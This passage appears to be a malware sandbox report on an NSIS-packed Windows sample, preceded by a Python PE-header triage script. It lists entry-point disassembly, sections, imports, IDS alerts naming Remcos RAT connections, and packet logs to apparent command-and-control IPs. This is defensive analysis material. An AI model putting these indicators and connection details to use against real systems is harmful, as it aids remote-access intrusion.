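            "entry_rva": f[6], "image_base": f[9], "subsystem": f[22],
            "dll_characteristics": f[23], "dirs": dirs, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    """Section whose virtual range contains rva, or None (e.g. rva 0 of an empty directory)."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + s["vsize"]:
            return s
    return None


def triage(pe: dict) -> dict:
    """The header checks worth running on a suspicious sample."""
    ep = section_for_rva(pe, pe["entry_rva"])
    claims_aslr = bool(pe["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(pe["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED)
    has_reloc_table = pe["dirs"].get("BASERELOC", (0, 0))[1] != 0
    linked = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    return {
        "entrypoint_va": hex(pe["image_base"] + pe["entry_rva"]),
        "entrypoint_section": ep["name"] if ep else None,
        "entrypoint_executable": bool(ep and ep["flags"] & IMAGE_SCN_MEM_EXECUTE),
        "link_time_utc": linked.strftime("%Y-%m-%d %H:%M:%S"),
        "claims_aslr": claims_aslr,
        # DYNAMIC_BASE is only a request: with no relocation table the loader has to
        # map the image at ImageBase, so the flag buys nothing.
        "aslr_effective": claims_aslr and not relocs_stripped and has_reloc_table,
        "directories": {name: (hex(rva), hex(size),
                               (section_for_rva(pe, rva) or {"name": None})["name"])
                        for name, (rva, size) in pe["dirs"].items() if size},
    }


def build_sample_pe() -> bytes:
    """CONSTRUCTED header-only PE32 mirroring the report's values; not the real sample.

    Entry point, image base, timestamp, flag words and the IMPORT/RESOURCE directories
    come from the report; the five-section layout and its sizes are assumptions.
    """
    sections = [  # name, virtual address, virtual size, characteristics
        (b".text", 0x1000, 0x6400, 0x60000020),
        (b".rdata", 0x8000, 0x1200, 0x40000040),
        (b".data", 0xA000, 0x1000, 0xC0000040),
        (b".ndata", 0xB000, 0x3D8000, 0xC0000080),
        (b".rsrc", 0x3E3000, 0x31350, 0x40000040),
    ]
    dirs = [(0, 0)] * 16
    dirs[1] = (0x84FC, 0xA0)       # IMAGE_DIRECTORY_ENTRY_IMPORT
    dirs[2] = (0x3E3000, 0x31350)  # IMAGE_DIRECTORY_ENTRY_RESOURCE; BASERELOC stays empty
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80)  # e_lfanew at 0x3C
    dos += b"\0" * (0x80 - len(dos))
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x597FCC62, 0, 0, 0xE0,
                       0x010F)  # RELOCS_STRIPPED|EXECUTABLE_IMAGE|LINE_NUMS|LOCAL_SYMS|32BIT
    opt = struct.pack(OPTIONAL_HDR_FMT, 0x10B, 6, 0, 0x6400, 0x3A000, 0x3D8000,
                      0x3350, 0x1000, 0x8000, 0x400000, 0x1000, 0x200,
                      4, 0, 4, 0, 4, 0, 0, 0x415000, 0x400, 0,
                      2, 0x8540,  # windows gui; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TS_AWARE
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    table = b"".join(struct.pack(SECTION_FMT, n, vs, va, 0, 0, 0, 0, 0, 0, fl)
                     for n, va, vs, fl in sections)
    image = dos + b"PE\0\0" + coff + opt + table
    return image + b"\0" * (0x400 - len(image))


if __name__ == "__main__":
    for key, value in triage(parse_pe(build_sample_pe())).items():
        print(f"{key}: {value}")
```

Run as a script it prints the triage of the constructed header; on a real file, pass open(path, "rb").read() to parse_pe. For this page's values the result reports the entry point at 0x403350 in .text, the import directory in .rdata and the resource directory in .rsrc, a link time of 2017-08-01 00:33:38 UTC, and claims_aslr True with aslr_effective False.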
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                                                                        call dword ptr [004080A4h]
                                                                                                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                                                        mov dword ptr [007A8A2Ch], eax
                                                                                                                                                                                                                                        je 00007F760C658933h
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        call 00007F760C65BBC9h
                                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                                        je 00007F760C658929h
                                                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                                        mov esi, 004082B0h
                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                        call 00007F760C65BB43h
                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                        call dword ptr [00408150h]
                                                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                                        jne 00007F760C65890Ch
                                                                                                                                                                                                                                        push 0000000Ah
                                                                                                                                                                                                                                        call 00007F760C65BB9Ch
                                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                                        call 00007F760C65BB95h
                                                                                                                                                                                                                                        push 00000006h
                                                                                                                                                                                                                                        mov dword ptr [007A8A24h], eax
                                                                                                                                                                                                                                        call 00007F760C65BB89h
                                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                                        je 00007F760C658931h
                                                                                                                                                                                                                                        push 0000001Eh
                                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007F760C658929h
                                                                                                                                                                                                                                        or byte ptr [007A8A2Fh], 00000040h
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        call dword ptr [00408044h]
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        call dword ptr [004082A0h]
                                                                                                                                                                                                                                        mov dword ptr [007A8AF8h], eax
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        push 0079FEE0h
                                                                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                                                                        push 0040A2C8h
                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e3000 | 0x31350 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x63c8 | 0x6400 | c9574a66dc77d8f1daec393ec45a9340 | False | 0.6766015625 | data | 6.504099201068482 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb38 | 0x600 | b58a1c46e0546d467ecde7b7f51a5ac7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x3a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3e3000 | 0x31350 | 0x31400 | 1a5e30c8ed816e683bafacf9b70f6fb3 | False | 0.45309029980964466 | data | 5.127644529748264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3e3388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.26761209038211287
RT_ICON | 0x3f3bb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3500105108261509
RT_ICON | 0x3fd058 | 0x8ea4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9976996385146237
RT_ICON | 0x405f00 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.37846580406654345
RT_ICON | 0x40b388 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.367737364194615
RT_ICON | 0x40f5b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4378630705394191
RT_ICON | 0x411b58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.47373358348968103
RT_ICON | 0x412c00 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5426229508196722
RT_ICON | 0x413588 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.625
RT_DIALOG | 0x4139f0 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x413b10 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x413c30 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x413cf8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x413d58 | 0x84 | data | English | United States | 0.7348484848484849
RT_VERSION | 0x413de0 | 0x230 | data | English | United States | 0.5464285714285714
RT_MANIFEST | 0x414010 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T16:44:19.723915+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49735 | 102.165.14.28 | 80 | TCP
2024-09-27T16:44:21.141834+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49736 | 102.165.14.28 | 26000 | TCP
2024-09-27T16:44:22.336649+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49737 | 178.237.33.50 | 80 | TCP
2024-09-27T16:44:22.344265+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49738 | 102.165.14.28 | 26000 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 16:44:19.436038017 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.571820974 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.571994066 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.572277069 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.723642111 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723656893 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723669052 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723680019 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723690987 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723702908 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723714113 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723726034 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723737001 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723747969 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.723915100 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.723915100 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859062910 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859087944 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859108925 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859127998 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859146118 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859246016 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859270096 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859286070 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859286070 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859289885 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859308958 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859327078 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859347105 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859366894 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859384060 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859402895 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859404087 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859404087 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859421968 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859440088 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859458923 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859477997 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859497070 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859505892 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859505892 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859515905 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.859538078 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859538078 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859539032 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.859680891 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
Sep 27, 2024 16:44:19.994961023 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.994993925 CEST | 80 | 49735 | 102.165.14.28 | 192.168.11.20
Sep 27, 2024 16:44:19.995210886 CEST | 49735 | 80 | 192.168.11.20 | 102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995280027 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995311022 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995336056 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995361090 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995383978 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995409966 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995434046 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995441914 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995457888 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995481968 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995507002 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995518923 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995518923 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995531082 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995552063 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995552063 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995554924 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995579004 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995601892 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995619059 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995619059 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995626926 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995651007 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995671988 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995671988 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995671988 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995675087 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995693922 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995698929 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995723009 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995743036 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995743036 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995747089 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995770931 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995791912 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995791912 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995795012 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995819092 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995841980 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995867014 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995891094 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995891094 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995891094 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995914936 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995939016 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995939970 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995961905 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.995985985 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996010065 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996033907 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996043921 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996043921 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996057987 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996081114 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996092081 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996093035 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996093035 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996107101 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996128082 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996151924 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996189117 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996190071 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996190071 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996238947 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996238947 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996288061 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:19.996386051 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.141901016 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.141933918 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.141959906 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.141983986 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142009020 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142035961 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142060041 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142083883 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142107964 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142132044 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142147064 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142147064 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142155886 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142180920 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142184019 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.142184019 CEST4973580192.168.11.20102.165.14.28
